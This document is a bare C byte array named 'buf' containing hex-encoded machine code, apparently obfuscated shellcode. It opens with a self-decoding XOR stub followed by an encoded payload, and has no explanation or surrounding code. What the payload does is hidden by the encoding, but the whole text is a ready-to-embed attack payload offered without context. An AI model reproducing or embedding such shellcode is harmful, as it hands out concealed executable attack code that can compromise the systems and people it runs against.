unsigned char buf[] = 
"\xeb\x27\x5b\x53\x5f\xb0\x7a\xfc\xae\x75\xfd\x57\x59\x53\x5e"
"\x8a\x06\x30\x07\x48\xff\xc7\x48\xff\xc6\x66\x81\x3f\xd6\x5d"
"\x74\x07\x80\x3e\x7a\x75\xea\xeb\xe6\xff\xe1\xe8\xd4\xff\xff"
"\xff\x02\x03\x7a\xe9\x24\x59\x50\x5d\xb3\xda\xff\xac\x76\xff"
"\x54\x5b\x50\x5c\x89\x04\x33\x05\x4b\xfd\xc4\x4a\xfc\xc4\x65"
"\x83\x3c\x98\xa7\x76\x04\x82\x3d\xda\x76\xe8\xe8\xe4\xfc\xe3"
"\xeb\xd6\xfc\xfd\xfc\x01\x0a\xda\xeb\x2c\x5b\x58\x5f\xbb\x6d"
"\xf7\xae\x7e\xfd\x5c\x59\x58\x5e\x81\x06\x3b\x07\x43\xff\xcc"
"\x48\xf4\xc6\x6d\x81\x34\x5b\x86\x74\x0c\x80\x35\x6d\x7e\xea"
"\xe0\xe6\xf4\xe1\xe3\xd4\xf4\xff\xf4\x05\x0e\x6d\xf2\x4d\x8d"
"\xe1\xfe\xed\xc2\x05\x0e\x05\x4f\x54\x4f\x55\x5c\x4d\x3f\xd7"
"\x6b\x4d\x85\x57\x6e\x4d\x85\x57\x16\x54\x46\x8e\x5c\x25\x58"
"\x48\x3f\xcc\x46\x0a\xb9\x4f\x44\x4d\x85\x77\x5e\x4d\x3f\xc5"
"\xa2\x39\x6f\x79\x0c\x29\x2e\x44\xcf\xcc\x03\x44\x0f\xc4\xec"
"\xe8\x5c\x4d\x85\x57\x2e\x8e\x4c\x39\x4f\x54\x46\x04\xde\x63"
"\x8f\x7d\x16\x0e\x0c\x0a\x8b\x77\x0e\x05\x0e\x8e\x8e\x8d\x0e"
"\x05\x0e\x4d\x8b\xc5\x7a\x62\x46\x04\xde\x55\x4a\x8e\x4e\x25"
"\x85\x4d\x16\x4c\x0f\xd5\xed\x53\x46\xfa\xc7\x44\x85\x31\x86"
"\x4d\x0f\xd3\x43\x34\xc7\x4d\x3f\xc5\x4f\xc4\xc7\x08\xa2\x44"
"\x0f\xc4\x36\xe5\x7b\xf4\x42\x06\x42\x21\x06\x40\x37\xd4\x7b"
"\xdd\x56\x41\x85\x45\x2a\x4c\x0f\xd5\x68\x44\x85\x09\x46\x41"
"\x85\x45\x12\x4c\x0f\xd5\x4f\x8e\x0a\x8d\x4f\x5d\x4f\x5d\x50"
"\x5c\x46\x04\xde\x5f\x4f\x5d\x4f\x5c\x4f\x5f\x46\x86\xe2\x25"
"\x4f\x57\xf1\xe5\x56\x44\x57\x5f\x46\x8e\x1c\xec\x45\xfa\xf1"
"\xfa\x53\x4d\x3f\xde\x5d\x4c\xb0\x72\x67\x6b\x67\x6b\x6b\x71"
"\x0e\x44\x58\x4d\x87\xe4\x47\xc2\xcc\x49\x79\x23\x09\xfa\xdb"
"\x56\x5d\x4d\x87\xe4\x5d\x5f\x43\x34\xce\x48\x3f\xcc\x5d\x56"
"\x47\xbf\x34\x53\x77\xa2\x0e\x05\x0e\x05\xf1\xd0\xe6\x0b\x0e"
"\x05\x0e\x34\x37\x37\x20\x34\x38\x3d\x20\x34\x20\x34\x3c\x3c"
"\x0e\x5f\x46\x8c\xcf\x4c\xc9\xc5\x52\x14\x0e\x05\x43\x34\xc7"
"\x56\x5d\x6f\x0d\x56\x47\xbf\x59\x8c\x91\xc3\x0e\x05\x0e\x05"
"\xf1\xd0\xe6\xe0\x0e\x05\x0e\x2a\x7f\x43\x5e\x63\x6d\x6a\x6f"
"\x68\x3b\x7f\x58\x40\x3c\x6e\x56\x5c\x44\x57\x7d\x70\x42\x44"
"\x42\x60\x43\x5c\x69\x70\x3a\x6b\x7b\x61\x74\x3c\x3d\x35\x37"
"\x31\x41\x53\x3f\x33\x60\x77\x47\x76\x36\x76\x6c\x63\x58\x6f"
"\x67\x33\x79\x44\x7f\x50\x74\x36\x5a\x4a\x7c\x41\x78\x61\x7b"
"\x66\x5b\x74\x4d\x70\x51\x53\x4d\x74\x39\x76\x4d\x62\x3a\x33"
"\x7d\x34\x3a\x6e\x63\x6e\x6f\x51\x4d\x6c\x5e\x31\x78\x57\x77"
"\x35\x58\x37\x44\x43\x5b\x68\x54\x75\x4b\x71\x7d\x40\x7f\x44"
"\x43\x31\x68\x44\x48\x74\x60\x30\x69\x6f\x6f\x49\x41\x55\x6f"
"\x67\x47\x42\x36\x7f\x69\x4a\x77\x72\x3b\x6b\x6f\x53\x58\x30"
"\x64\x44\x56\x76\x66\x48\x79\x68\x59\x33\x5a\x63\x4d\x53\x3c"
"\x51\x43\x6e\x3d\x37\x7a\x3d\x47\x34\x3b\x35\x7f\x7d\x74\x5f"
"\x7a\x63\x6a\x37\x3f\x3d\x5f\x35\x77\x6d\x59\x76\x7c\x43\x67"
"\x69\x59\x34\x7b\x44\x67\x37\x6d\x33\x74\x4a\x36\x6b\x79\x72"
"\x39\x37\x43\x32\x43\x37\x64\x40\x3e\x42\x68\x32\x67\x48\x4f"
"\x42\x68\x62\x48\x6e\x3e\x6c\x4f\x53\x6d\x05\x46\x8c\xcf\x56"
"\x54\x44\x56\x48\x3f\xcc\x5d\x4d\xb6\x05\x3c\xad\x8a\x05\x0e"
"\x05\x0e\x55\x5d\x56\x47\xc2\xcc\xee\x5b\x2b\x35\xfa\xdb\x4d"
"\x87\xc3\x64\x0f\x51\x4d\x87\xf4\x64\x1a\x54\x57\x66\x85\x3d"
"\x05\x0e\x4c\x87\xe5\x64\x01\x4f\x5c\x47\xbf\x7b\x43\x90\x83"
"\x0e\x05\x0e\x05\xf1\xd0\x43\x34\xce\x56\x54\x4d\x87\xf4\x43"
"\x34\xc7\x48\x3f\xcc\x5d\x56\x47\xc2\xcc\x28\x08\x1d\x75\xfa"
"\xdb\x80\xce\x70\x11\x4d\xc9\xc4\x86\x16\x0e\x05\x47\xbf\x4a"
"\xf5\x3b\xe5\x0e\x05\x0e\x05\xf1\xd0\x46\xfa\xc1\x71\x0c\xee"
"\xa4\xed\x5b\x05\x0e\x05\x5d\x5c\x64\x45\x54\x4c\x87\xd4\xcf"
"\xe7\x1e\x4c\xc9\xc5\x0e\x15\x0e\x05\x47\xbf\x56\xa1\x5d\xe0"
"\x0e\x05\x0e\x05\xf1\xd0\x46\x96\x5d\x56\x46\x8c\xe9\x4d\x87"
"\xf4\x46\x8c\xd4\x4c\xc9\xc5\x0e\x25\x0e\x05\x47\x8c\xf7\x4c"
"\xb4\x17\x98\x8c\xec\x05\x0e\x05\x0e\xfa\xdb\x4d\x8d\xc1\x2e"
"\x80\xce\x71\xbc\x63\x85\x02\x46\x04\xcd\x80\xce\x70\xdc\x5d"
"\xcd\x5d\x64\x05\x57\x4c\xc9\xc7\xfe\xb0\xac\x53\xf1\xd0\x50"
"\x8d\x98\xa7\xd6\x5d";
